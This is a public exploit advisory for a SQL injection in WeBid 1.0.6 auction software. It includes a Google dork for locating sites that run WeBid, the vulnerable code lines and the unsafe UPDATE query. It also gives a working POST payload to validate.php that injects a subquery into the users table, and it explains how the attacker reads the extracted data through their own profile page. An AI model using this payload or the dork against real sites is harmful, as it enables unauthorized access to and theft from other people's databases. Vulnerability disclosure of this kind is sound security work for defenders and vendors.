# Exploit Title: WeBid 1.0.6 SQL Injection Vulnerability# Google Dork: "Powered by WeBid"# Date: 1/9/13# Exploit Author: Life Wasted# Vendor Homepage: http://www.webidsupport.com/# Version: Tested on 1.0.6, but could affect other version# Tested On: Linux, Windows
Vulnerable Code:
Line 53 of the validate.php file
Lines 198 through 202and234in the includes/functions_fees.php file
Proof of Concept:
validate.php?toocheckout=asdf calls the toocheckout_validate() function
toocheckout_validate() takes unsanitized post inputfrom2 different parameters (total and cart_order_id)
toocheckout_validate() calls callback_process()if the post parameter credit_card_processed is equal to 'Y'
The unsanitized parameters are using in an UPDATE query:
$query ="UPDATE ". $DBPrefix ."users SET balance = balance + ". $payment_amount . $addquery ." WHERE id = ". $custom_id;
This allows an attacker to retrieve data using a time-based blind injection technique or by updating a pre-existing value to the output of an embedded query.
For example, the attacker could send the following post data to extract the name of the current database.
http://site.com/validate.php?toocheckout=asdf
POST DATA: cart_order_id=*Attackers UserID*WEBID1&credit_card_processed=Y&total=1, name=(SELECT database())
The resulting query would be:
UPDATE users SET balance = balance +1, name=(SELECT database()) WHERE id=*Attackers User ID*
Then the attacker could sign in to their account and view the requested data by going to the edit_data.php page
